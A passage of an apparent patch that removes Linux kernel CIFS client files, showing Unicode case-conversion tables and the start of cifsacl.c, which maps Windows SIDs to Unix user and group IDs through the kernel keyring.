+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e40-1e4f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e50-1e5f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e60-1e6f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e70-1e7f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e80-1e8f */
+-	0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, -59, 0, -1, 0, -1,	/* 1e90-1e9f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ea0-1eaf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1eb0-1ebf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ec0-1ecf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ed0-1edf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ee0-1eef */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f00-1f0f */
+-	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f10-1f1f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f20-1f2f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f30-1f3f */
+-	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f40-1f4f */
+-	0, 8, 0, 8, 0, 8, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f50-1f5f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f60-1f6f */
+-	74, 74, 86, 86, 86, 86, 100, 100, 0, 0, 112, 112, 126, 126, 0, 0,	/* 1f70-1f7f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f80-1f8f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f90-1f9f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fa0-1faf */
+-	8, 8, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fb0-1fbf */
+-	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fc0-1fcf */
+-	8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fd0-1fdf */
+-	8, 8, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fe0-1fef */
+-	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+-};
+-
+-/* Upper case range - Wide latin */
+-static signed char UniCaseRangeUff40[27] = {
+-	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* ff40-ff4f */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-};
+-
+-/*
+- * Upper Case Range
+- */
+-const struct UniCaseRange CifsUniUpperRange[] = {
+-	{0x03a0, 0x03ce, UniCaseRangeU03a0},
+-	{0x0430, 0x045f, UniCaseRangeU0430},
+-	{0x0490, 0x04cc, UniCaseRangeU0490},
+-	{0x1e00, 0x1ffc, UniCaseRangeU1e00},
+-	{0xff40, 0xff5a, UniCaseRangeUff40},
+-	{0}
+-};
+-#endif
+-
+-#ifndef UNIUPR_NOLOWER
+-/*
+- * Latin lower case
+- */
+-signed char CifsUniLowerTable[512] = {
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
+-	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 040-04f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 0, 0, 0, 0, 0,	/* 050-05f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 060-06f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 070-07f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 0c0-0cf */
+-	32, 32, 32, 32, 32, 32, 32, 0, 32, 32, 32, 32, 32, 32, 32, 0,	/* 0d0-0df */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0e0-0ef */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0f0-0ff */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 100-10f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 110-11f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 120-12f */
+-	0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1,	/* 130-13f */
+-	0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0,	/* 140-14f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 150-15f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 160-16f */
+-	1, 0, 1, 0, 1, 0, 1, 0, -121, 1, 0, 1, 0, 1, 0, 0,	/* 170-17f */
+-	0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 79, 0,	/* 180-18f */
+-	0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 190-19f */
+-	1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1,	/* 1a0-1af */
+-	0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0,	/* 1b0-1bf */
+-	0, 0, 0, 0, 2, 1, 0, 2, 1, 0, 2, 1, 0, 1, 0, 1,	/* 1c0-1cf */
+-	0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0,	/* 1d0-1df */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e0-1ef */
+-	0, 2, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1f0-1ff */
+-};
+-
+-/* Lower case range - Greek */
+-static signed char UniCaseRangeL0380[44] = {
+-	0, 0, 0, 0, 0, 0, 38, 0, 37, 37, 37, 0, 64, 0, 63, 63,	/* 380-38f */
+-	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 390-39f */
+-	32, 32, 0, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-};
+-
+-/* Lower case range - Cyrillic */
+-static signed char UniCaseRangeL0400[48] = {
+-	0, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 0, 80, 80,	/* 400-40f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 410-41f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 420-42f */
+-};
+-
+-/* Lower case range - Extended cyrillic */
+-static signed char UniCaseRangeL0490[60] = {
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 490-49f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4a0-4af */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4b0-4bf */
+-	0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1,
+-};
+-
+-/* Lower case range - Extended latin and greek */
+-static signed char UniCaseRangeL1e00[504] = {
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e00-1e0f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e10-1e1f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e20-1e2f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e30-1e3f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e40-1e4f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e50-1e5f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e60-1e6f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e70-1e7f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e80-1e8f */
+-	1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,	/* 1e90-1e9f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ea0-1eaf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1eb0-1ebf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ec0-1ecf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ed0-1edf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ee0-1eef */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f00-1f0f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f10-1f1f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f20-1f2f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f30-1f3f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f40-1f4f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, -8, 0, -8, 0, -8, 0, -8,	/* 1f50-1f5f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f60-1f6f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f70-1f7f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f80-1f8f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f90-1f9f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1fa0-1faf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -74, -74, -9, 0, 0, 0,	/* 1fb0-1fbf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -86, -86, -86, -86, -9, 0, 0, 0,	/* 1fc0-1fcf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -100, -100, 0, 0, 0, 0,	/* 1fd0-1fdf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -112, -112, -7, 0, 0, 0,	/* 1fe0-1fef */
+-	0, 0, 0, 0, 0, 0, 0, 0,
+-};
+-
+-/* Lower case range - Wide latin */
+-static signed char UniCaseRangeLff20[27] = {
+-	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* ff20-ff2f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-};
+-
+-/*
+- * Lower Case Range
+- */
+-const struct UniCaseRange CifsUniLowerRange[] = {
+-	{0x0380, 0x03ab, UniCaseRangeL0380},
+-	{0x0400, 0x042f, UniCaseRangeL0400},
+-	{0x0490, 0x04cb, UniCaseRangeL0490},
+-	{0x1e00, 0x1ff7, UniCaseRangeL1e00},
+-	{0xff20, 0xff3a, UniCaseRangeLff20},
+-	{0}
+-};
+-#endif
+diff --git a/fs/cifs/cifsacl.c b/fs/cifs/cifsacl.c
+deleted file mode 100644
+index a6c7566a01821..0000000000000
+--- a/fs/cifs/cifsacl.c
++++ /dev/null
+@@ -1,1672 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2007,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- *   Contains the routines for mapping CIFS/NTFS ACLs
+- *
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/slab.h>
+-#include <linux/string.h>
+-#include <linux/keyctl.h>
+-#include <linux/key-type.h>
+-#include <keys/user-type.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsacl.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "fs_context.h"
+-
+-/* security id for everyone/world system group */
+-static const struct cifs_sid sid_everyone = {
+-	1, 1, {0, 0, 0, 0, 0, 1}, {0} };
+-/* security id for Authenticated Users system group */
+-static const struct cifs_sid sid_authusers = {
+-	1, 1, {0, 0, 0, 0, 0, 5}, {cpu_to_le32(11)} };
+-
+-/* S-1-22-1 Unmapped Unix users */
+-static const struct cifs_sid sid_unix_users = {1, 1, {0, 0, 0, 0, 0, 22},
+-		{cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/* S-1-22-2 Unmapped Unix groups */
+-static const struct cifs_sid sid_unix_groups = { 1, 1, {0, 0, 0, 0, 0, 22},
+-		{cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/*
+- * See https://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
+- */
+-
+-/* S-1-5-88 MS NFS and Apple style UID/GID/mode */
+-
+-/* S-1-5-88-1 Unix uid */
+-static const struct cifs_sid sid_unix_NFS_users = { 1, 2, {0, 0, 0, 0, 0, 5},
+-	{cpu_to_le32(88),
+-	 cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/* S-1-5-88-2 Unix gid */
+-static const struct cifs_sid sid_unix_NFS_groups = { 1, 2, {0, 0, 0, 0, 0, 5},
+-	{cpu_to_le32(88),
+-	 cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/* S-1-5-88-3 Unix mode */
+-static const struct cifs_sid sid_unix_NFS_mode = { 1, 2, {0, 0, 0, 0, 0, 5},
+-	{cpu_to_le32(88),
+-	 cpu_to_le32(3), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-static const struct cred *root_cred;
+-
+-static int
+-cifs_idmap_key_instantiate(struct key *key, struct key_preparsed_payload *prep)
+-{
+-	char *payload;
+-
+-	/*
+-	 * If the payload is less than or equal to the size of a pointer, then
+-	 * an allocation here is wasteful. Just copy the data directly to the
+-	 * payload.value union member instead.
+-	 *
+-	 * With this however, you must check the datalen before trying to
+-	 * dereference payload.data!
+-	 */
+-	if (prep->datalen <= sizeof(key->payload)) {
+-		key->payload.data[0] = NULL;
+-		memcpy(&key->payload, prep->data, prep->datalen);
+-	} else {
+-		payload = kmemdup(prep->data, prep->datalen, GFP_KERNEL);
+-		if (!payload)
+-			return -ENOMEM;
+-		key->payload.data[0] = payload;
+-	}
+-
+-	key->datalen = prep->datalen;
+-	return 0;
+-}
+-
+-static inline void
+-cifs_idmap_key_destroy(struct key *key)
+-{
+-	if (key->datalen > sizeof(key->payload))
+-		kfree(key->payload.data[0]);
+-}
+-
+-static struct key_type cifs_idmap_key_type = {
+-	.name        = "cifs.idmap",
+-	.instantiate = cifs_idmap_key_instantiate,
+-	.destroy     = cifs_idmap_key_destroy,
+-	.describe    = user_describe,
+-};
+-
+-static char *
+-sid_to_key_str(struct cifs_sid *sidptr, unsigned int type)
+-{
+-	int i, len;
+-	unsigned int saval;
+-	char *sidstr, *strptr;
+-	unsigned long long id_auth_val;
+-
+-	/* 3 bytes for prefix */
+-	sidstr = kmalloc(3 + SID_STRING_BASE_SIZE +
+-			 (SID_STRING_SUBAUTH_SIZE * sidptr->num_subauth),
+-			 GFP_KERNEL);
+-	if (!sidstr)
+-		return sidstr;
+-
+-	strptr = sidstr;
+-	len = sprintf(strptr, "%cs:S-%hhu", type == SIDOWNER ? 'o' : 'g',
+-			sidptr->revision);
+-	strptr += len;
+-
+-	/* The authority field is a single 48-bit number */
+-	id_auth_val = (unsigned long long)sidptr->authority[5];
+-	id_auth_val |= (unsigned long long)sidptr->authority[4] << 8;
+-	id_auth_val |= (unsigned long long)sidptr->authority[3] << 16;
+-	id_auth_val |= (unsigned long long)sidptr->authority[2] << 24;
+-	id_auth_val |= (unsigned long long)sidptr->authority[1] << 32;
+-	id_auth_val |= (unsigned long long)sidptr->authority[0] << 48;
+-
+-	/*
+-	 * MS-DTYP states that if the authority is >= 2^32, then it should be
+-	 * expressed as a hex value.
+-	 */
+-	if (id_auth_val <= UINT_MAX)
+-		len = sprintf(strptr, "-%llu", id_auth_val);
+-	else
+-		len = sprintf(strptr, "-0x%llx", id_auth_val);
+-
+-	strptr += len;
+-
+-	for (i = 0; i < sidptr->num_subauth; ++i) {
+-		saval = le32_to_cpu(sidptr->sub_auth[i]);
+-		len = sprintf(strptr, "-%u", saval);
+-		strptr += len;
+-	}
+-
+-	return sidstr;
+-}
+-
+-/*
+- * if the two SIDs (roughly equivalent to a UUID for a user or group) are
+- * the same returns zero, if they do not match returns non-zero.
+- */
+-static int
+-compare_sids(const struct cifs_sid *ctsid, const struct cifs_sid *cwsid)
+-{
+-	int i;
+-	int num_subauth, num_sat, num_saw;
+-
+-	if ((!ctsid) || (!cwsid))
+-		return 1;
+-
+-	/* compare the revision */
+-	if (ctsid->revision != cwsid->revision) {
+-		if (ctsid->revision > cwsid->revision)
+-			return 1;
+-		else
+-			return -1;
+-	}
+-
+-	/* compare all of the six auth values */
+-	for (i = 0; i < NUM_AUTHS; ++i) {
+-		if (ctsid->authority[i] != cwsid->authority[i]) {
+-			if (ctsid->authority[i] > cwsid->authority[i])
+-				return 1;
+-			else
+-				return -1;
+-		}
+-	}
+-
+-	/* compare all of the subauth values if any */
+-	num_sat = ctsid->num_subauth;
+-	num_saw = cwsid->num_subauth;
+-	num_subauth = num_sat < num_saw ? num_sat : num_saw;
+-	if (num_subauth) {
+-		for (i = 0; i < num_subauth; ++i) {
+-			if (ctsid->sub_auth[i] != cwsid->sub_auth[i]) {
+-				if (le32_to_cpu(ctsid->sub_auth[i]) >
+-					le32_to_cpu(cwsid->sub_auth[i]))
+-					return 1;
+-				else
+-					return -1;
+-			}
+-		}
+-	}
+-
+-	return 0; /* sids compare/match */
+-}
+-
+-static bool
+-is_well_known_sid(const struct cifs_sid *psid, uint32_t *puid, bool is_group)
+-{
+-	int i;
+-	int num_subauth;
+-	const struct cifs_sid *pwell_known_sid;
+-
+-	if (!psid || (puid == NULL))
+-		return false;
+-
+-	num_subauth = psid->num_subauth;
+-
+-	/* check if Mac (or Windows NFS) vs. Samba format for Unix owner SID */
+-	if (num_subauth == 2) {
+-		if (is_group)
+-			pwell_known_sid = &sid_unix_groups;
+-		else
+-			pwell_known_sid = &sid_unix_users;
+-	} else if (num_subauth == 3) {
+-		if (is_group)
+-			pwell_known_sid = &sid_unix_NFS_groups;
+-		else
+-			pwell_known_sid = &sid_unix_NFS_users;
+-	} else
+-		return false;
+-
+-	/* compare the revision */
+-	if (psid->revision != pwell_known_sid->revision)
+-		return false;
+-
+-	/* compare all of the six auth values */
+-	for (i = 0; i < NUM_AUTHS; ++i) {
+-		if (psid->authority[i] != pwell_known_sid->authority[i]) {
+-			cifs_dbg(FYI, "auth %d did not match\n", i);
+-			return false;
+-		}
+-	}
+-
+-	if (num_subauth == 2) {
+-		if (psid->sub_auth[0] != pwell_known_sid->sub_auth[0])
+-			return false;
+-
+-		*puid = le32_to_cpu(psid->sub_auth[1]);
+-	} else /* 3 subauths, ie Windows/Mac style */ {
+-		*puid = le32_to_cpu(psid->sub_auth[0]);
+-		if ((psid->sub_auth[0] != pwell_known_sid->sub_auth[0]) ||
+-		    (psid->sub_auth[1] != pwell_known_sid->sub_auth[1]))
+-			return false;
+-
+-		*puid = le32_to_cpu(psid->sub_auth[2]);
+-	}
+-
+-	cifs_dbg(FYI, "Unix UID %d returned from SID\n", *puid);
+-	return true; /* well known sid found, uid returned */
+-}
+-
+-static __u16
+-cifs_copy_sid(struct cifs_sid *dst, const struct cifs_sid *src)
+-{
+-	int i;
+-	__u16 size = 1 + 1 + 6;
+-
+-	dst->revision = src->revision;
+-	dst->num_subauth = min_t(u8, src->num_subauth, SID_MAX_SUB_AUTHORITIES);
+-	for (i = 0; i < NUM_AUTHS; ++i)
+-		dst->authority[i] = src->authority[i];
+-	for (i = 0; i < dst->num_subauth; ++i)
+-		dst->sub_auth[i] = src->sub_auth[i];
+-	size += (dst->num_subauth * 4);
+-
+-	return size;
+-}
+-
+-static int
+-id_to_sid(unsigned int cid, uint sidtype, struct cifs_sid *ssid)
+-{
+-	int rc;
+-	struct key *sidkey;
+-	struct cifs_sid *ksid;
+-	unsigned int ksid_size;
+-	char desc[3 + 10 + 1]; /* 3 byte prefix + 10 bytes for value + NULL */
+-	const struct cred *saved_cred;
+-
+-	rc = snprintf(desc, sizeof(desc), "%ci:%u",
+-			sidtype == SIDOWNER ? 'o' : 'g', cid);
+-	if (rc >= sizeof(desc))
+-		return -EINVAL;
+-
+-	rc = 0;
+-	saved_cred = override_creds(root_cred);
+-	sidkey = request_key(&cifs_idmap_key_type, desc, "");
+-	if (IS_ERR(sidkey)) {
+-		rc = -EINVAL;
+-		cifs_dbg(FYI, "%s: Can't map %cid %u to a SID\n",
+-			 __func__, sidtype == SIDOWNER ? 'u' : 'g', cid);
+-		goto out_revert_creds;
+-	} else if (sidkey->datalen < CIFS_SID_BASE_SIZE) {
+-		rc = -EIO;
+-		cifs_dbg(FYI, "%s: Downcall contained malformed key (datalen=%hu)\n",
+-			 __func__, sidkey->datalen);
+-		goto invalidate_key;
+-	}
+-
+-	/*
+-	 * A sid is usually too large to be embedded in payload.value, but if
+-	 * there are no subauthorities and the host has 8-byte pointers, then
+-	 * it could be.
+-	 */
+-	ksid = sidkey->datalen <= sizeof(sidkey->payload) ?
+-		(struct cifs_sid *)&sidkey->payload :
+-		(struct cifs_sid *)sidkey->payload.data[0];
+-
+-	ksid_size = CIFS_SID_BASE_SIZE + (ksid->num_subauth * sizeof(__le32));
+-	if (ksid_size > sidkey->datalen) {
+-		rc = -EIO;
+-		cifs_dbg(FYI, "%s: Downcall contained malformed key (datalen=%hu, ksid_size=%u)\n",
+-			 __func__, sidkey->datalen, ksid_size);
+-		goto invalidate_key;
+-	}
+-
+-	cifs_copy_sid(ssid, ksid);
+-out_key_put:
+-	key_put(sidkey);
+-out_revert_creds:
+-	revert_creds(saved_cred);
+-	return rc;
+-
+-invalidate_key:
+-	key_invalidate(sidkey);
+-	goto out_key_put;
+-}
+-
+-int
+-sid_to_id(struct cifs_sb_info *cifs_sb, struct cifs_sid *psid,
+-		struct cifs_fattr *fattr, uint sidtype)
+-{
+-	int rc = 0;
+-	struct key *sidkey;
+-	char *sidstr;
+-	const struct cred *saved_cred;
+-	kuid_t fuid = cifs_sb->ctx->linux_uid;
+-	kgid_t fgid = cifs_sb->ctx->linux_gid;
+-
+-	/*
+-	 * If we have too many subauthorities, then something is really wrong.
+-	 * Just return an error.
+-	 */
+-	if (unlikely(psid->num_subauth > SID_MAX_SUB_AUTHORITIES)) {
+-		cifs_dbg(FYI, "%s: %u subauthorities is too many!\n",
+-			 __func__, psid->num_subauth);
+-		return -EIO;
+-	}
+-
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL) ||
+-	    (cifs_sb_master_tcon(cifs_sb)->posix_extensions)) {
+-		uint32_t unix_id;
+-		bool is_group;
+-
+-		if (sidtype != SIDOWNER)
+-			is_group = true;
+-		else
+-			is_group = false;
+-
+-		if (is_well_known_sid(psid, &unix_id, is_group) == false)
+-			goto try_upcall_to_get_id;
+-
+-		if (is_group) {
+-			kgid_t gid;
+-			gid_t id;
+-
+-			id = (gid_t)unix_id;
+-			gid = make_kgid(&init_user_ns, id);
+-			if (gid_valid(gid)) {
+-				fgid = gid;
+-				goto got_valid_id;
+-			}
+-		} else {
+-			kuid_t uid;
+-			uid_t id;
+-
+-			id = (uid_t)unix_id;
+-			uid = make_kuid(&init_user_ns, id);
+-			if (uid_valid(uid)) {
+-				fuid = uid;
+-				goto got_valid_id;
+-			}
+-		}
+-		/* If unable to find uid/gid easily from SID try via upcall */
+-	}
+-
+-try_upcall_to_get_id:
+-	sidstr = sid_to_key_str(psid, sidtype);
+-	if (!sidstr)
+-		return -ENOMEM;
+-
+-	saved_cred = override_creds(root_cred);
+-	sidkey = request_key(&cifs_idmap_key_type, sidstr, "");
+-	if (IS_ERR(sidkey)) {
+-		cifs_dbg(FYI, "%s: Can't map SID %s to a %cid\n",
+-			 __func__, sidstr, sidtype == SIDOWNER ? 'u' : 'g');
+-		goto out_revert_creds;
+-	}
+-
+-	/*
+-	 * FIXME: Here we assume that uid_t and gid_t are same size. It's
+-	 * probably a safe assumption but might be better to check based on
+-	 * sidtype.
+-	 */
+-	BUILD_BUG_ON(sizeof(uid_t) != sizeof(gid_t));
+-	if (sidkey->datalen != sizeof(uid_t)) {
+-		cifs_dbg(FYI, "%s: Downcall contained malformed key (datalen=%hu)\n",
+-			 __func__, sidkey->datalen);
+-		key_invalidate(sidkey);
+-		goto out_key_put;
+-	}
+-
+-	if (sidtype == SIDOWNER) {
+-		kuid_t uid;
+-		uid_t id;
+-		memcpy(&id, &sidkey->payload.data[0], sizeof(uid_t));
+-		uid = make_kuid(&init_user_ns, id);
+-		if (uid_valid(uid))
+-			fuid = uid;
+-	} else {
+-		kgid_t gid;
+-		gid_t id;
+-		memcpy(&id, &sidkey->payload.data[0], sizeof(gid_t));
+-		gid = make_kgid(&init_user_ns, id);
+-		if (gid_valid(gid))
+-			fgid = gid;
+-	}
+-
+-out_key_put:
+-	key_put(sidkey);
+-out_revert_creds:
+-	revert_creds(saved_cred);
+-	kfree(sidstr);
+-
+-	/*
+-	 * Note that we return 0 here unconditionally. If the mapping
+-	 * fails then we just fall back to using the ctx->linux_uid/linux_gid.
+-	 */
+-got_valid_id:
+-	rc = 0;
+-	if (sidtype == SIDOWNER)
+-		fattr->cf_uid = fuid;
+-	else
+-		fattr->cf_gid = fgid;
+-	return rc;
+-}
+-
+-int
+-init_cifs_idmap(void)
+-{
+-	struct cred *cred;
+-	struct key *keyring;
+-	int ret;
+-
+-	cifs_dbg(FYI, "Registering the %s key type\n",
+-		 cifs_idmap_key_type.name);
+-
+-	/* create an override credential set with a special thread keyring in
+-	 * which requests are cached
+-	 *
+-	 * this is used to prevent malicious redirections from being installed
+-	 * with add_key().
+-	 */
+-	cred = prepare_kernel_cred(NULL);
+-	if (!cred)
+-		return -ENOMEM;
+-
+-	keyring = keyring_alloc(".cifs_idmap",
+-				GLOBAL_ROOT_UID, GLOBAL_ROOT_GID, cred,
